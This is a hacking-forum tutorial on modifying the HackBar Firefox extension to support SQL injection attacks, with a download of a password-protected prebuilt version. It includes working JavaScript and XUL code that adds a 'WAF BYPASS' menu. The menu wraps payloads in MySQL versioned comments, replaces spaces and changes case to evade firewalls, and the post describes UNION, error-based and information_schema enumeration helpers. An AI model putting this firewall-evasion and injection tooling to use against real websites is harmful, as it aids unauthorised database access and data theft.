[make your own hackbar] - customize/modify Hackbar extension

Posted by Myanmar H4x0r on - -



Today i will give you a little start with customizing the Mozilla Plugin HACKBAR!

[Image: basic2.jpg]
Required knowledge for customizing: HTML, CSS, JS
(or you can download my ready-to-use Hackbar below in this post)

First of all most of the credit schould go out to the original coders of hackbar: Johan Adriaans & Pedro Laguna!

1) Get the Hackbar files

If you havent installed hackbar yet you can download it trough mozilla addon-manager or use my one below.
If you have installed hackbar you can use clean install file for your mods. Just copy the instal file called:
[Image: image.jpg]
{F5DDF39C-9293-4d5e-9AA8-E04E6DD5E9B4}.xpi
mostly located in:

For Windows User:
C:\user\user_profile\appdata\roaming\mozilla\firefox\profiles\profile.default\ex​tensions

For Linux User:
/home/user/.mozilla/firefox/k65bvcin.default/extensions

Just unpack these files in a Folder (use winrar or similar). Thats what we want to edit.

2) About the files

chrome/content/hackbar.xul
This is the face of Hackbar. If you want to add Buttons, Inputs or whatever - do it here

chrome/local/en-US/hackbar.dtd
Here are all label-descriptions. If you add Buttons in hackbar.xul the buttons where labeled in the hackbar.dtd 
(but you can label all tags in the .xul too - but the dtd is better for changing languages e.t.c....)

chrome/content/main.js
The Basic-JS-functions saved in here.

chrome/content/SQL.js
All SQL-Statements saved in here (they are just .js functions)

...and...so...on....

3) Customizing / modifying hackbar

First off all i want to say that i only show a few things. I dont know about the response to this topic.
More functions are added in the hackbar you can download below.

First example:
My first intension was to change the hackbar generated string UNION SELECT to UNION+ALL+SELECT
To do this we have to change the VARIABLE in SQL.js at line 38:
Code:
var txt = "UNION SELECT " + colArray.join( ',' );

2nd example:
Add a Bypass function(for demonstration install my hackbar from download-package below)

to do this you have to do the following changes:
First add the new button and popupmenu in cchrome/content/hackbar.xul
Code:
            <!-- WAF BYPASS MENU -->
            <toolbarbutton class="menuitem-iconic" type="menu" label="&hackbar.WAFMenuLabel;" onmouseover="HackBar.GUI.openToolbarButton(this)">
            <menupopup> 
            <menuitem class="menuitem-iconic" image="chrome://hackbar/skin/database.png" label="/*!_STRING_*/" oncommand="HackBar.SQL.CalcWaf('1')"/>
            <menuitem class="menuitem-iconic" image="chrome://hackbar/skin/database.png" label="/*!50000_STRING_*/" oncommand="HackBar.SQL.CalcWaf('2')"/>
            <menuitem class="menuitem-iconic" image="chrome://hackbar/skin/database.png" label="/*!12345_STRING_*/" oncommand="HackBar.SQL.CalcWaf('3')"/>
            <menuitem class="menuitem-iconic" image="chrome://hackbar/skin/database.png" label="cutoffCUTOFFWAFwaf" oncommand="HackBar.SQL.CalcWaf('4')"/>
            </menupopup>
    </toolbarbutton>
            <!-- / BWAF BYPASS MENU -->

then add the labeltextes in chrome/locale/en-US/hackbar.dtd
Code:
<!ENTITY hackbar.WAFMenuLabel "WAF BYPASS">

and finally add in chrome/content/SQL.js the primary function:
Code:
/* WAF CALCULATE  */
    CalcWaf: function (choice)
      {
        var txt = hackBar.getSelectedText();             
        var str = choice;
        switch (str){
            case '1': txt = txt.replace(/ /g, "/**/");
                txt= ("/*!" + txt + "*/");
        break;
            case '2': txt = txt.replace(/ /g, "+");
                txt= ("/*!50000" + txt + "*/");
        break;
            case '3': txt = txt.replace(/ /g, "+");
                txt= ("/*!12345" + txt + "*/");
        break;
            case '4':var txt = txt.toLowerCase();
                String.prototype.insert = new Function('intPos','strIns','return this.substring(0,intPos) + strIns + this.substring(intPos,this.length);');   
                var input2val = txt.toUpperCase();
                txt = (txt.insert(2,input2val));
                txt = txt.replace(/ /g, "/*&a=*/");
        break;
        }      
        hackBar.setSelectedText( txt );
      }

4) Install modified hackbar

If you ready with your changes just replace the files in the original archive via drag and drop.

You also can pack the files in a new archive. I tested with 7-zip and winrar and works fine. 
NOTICE: just choose ZIP as format if you use winrar and rename the extension to xpi.

After you have packed your archive just right-click on it and "open with firefox" --> install shield will appear --> normal install (you dont have to uninstall earlier versions cos the files overwrite themselves)

For those of u guys who want to make the changes LIVE without uninstall / install the hackbar with every change, do this:

THAT'S IT WITH TUTORIAL. FOR DOWNLOAD MY READY TO USE HACKBAR READ THIS:

[Image: hackbar_1.jpg]
Ok guys here we go with the next and last public version* of my hackbar modify (1.4.2).
*sure i will fix bugs of the 1.4.2 if they where reported to me

Features:
  • added more select-queries
  • URL-Encode-function
  • Base64 t.PRO function
  • more Error-Based and Double-Query-Based (Big THX to _USERNAME_ for that part)
  • added group+by function
  • simple WAF bypass (comment and CutOff)

CHANGELOG:

DOWNLOAD t.PRO HACKBAR VERSION 1.4.2
password for WINRAR-archive: /!"§++u6943$%&~+#~/()~TPRO~=io?

[Image: hackbar_2.jpg]
(screens not sorted...)

[Image: hackbar_3.jpg]

1) use [BASE64] as spacer in Hackbar-URL-field
2) when you execute - hackbar will automaticly convert [BASE64] to a Base64 encoded string! (with replacing the + to whitespace)

[Image: hackbar_4.jpg]

0xHEX
This is a function that already exists in original Hackbar but without adding the 0x at first.
This function will only be loved by my challenge-friends for better/faster converting between Hex and Strings (normal injectors really dont need that function)

%URL
This is the new URL-ENCODING function.
Another WAF-BYPASS-TECHNIQUE.

[Image: hackbar_5.jpg]

Now Hackbar automatically encodes the database-/table-/column names to 0xHEX from a given query.
For example if u use the hackbar query:
PHP Code:
+from+information_schema.tables+where+table_schema=database() 

 hackbar ask u with a prompt wich database you want to concat.
--> If u choose database() then hackbar dont hex
--> if u use another DB-Name: Hackbar 0xHEX the DB-name automatically.

I think its an nice feature!

Ok guys thats it. i hope u like it!
__

once again:
DOWNLOAD t.PRO HACKBAR VERSION 1.4.2
password for WINRAR-archive: /!"§++u6943$%&~+#~/()~TPRO~=io?

(to install just right click --> open with firefox)

If you find any bugs - please report it via PM!
please test and feel free to leave any comments!

Greetz TechProspect
Credit:T-pro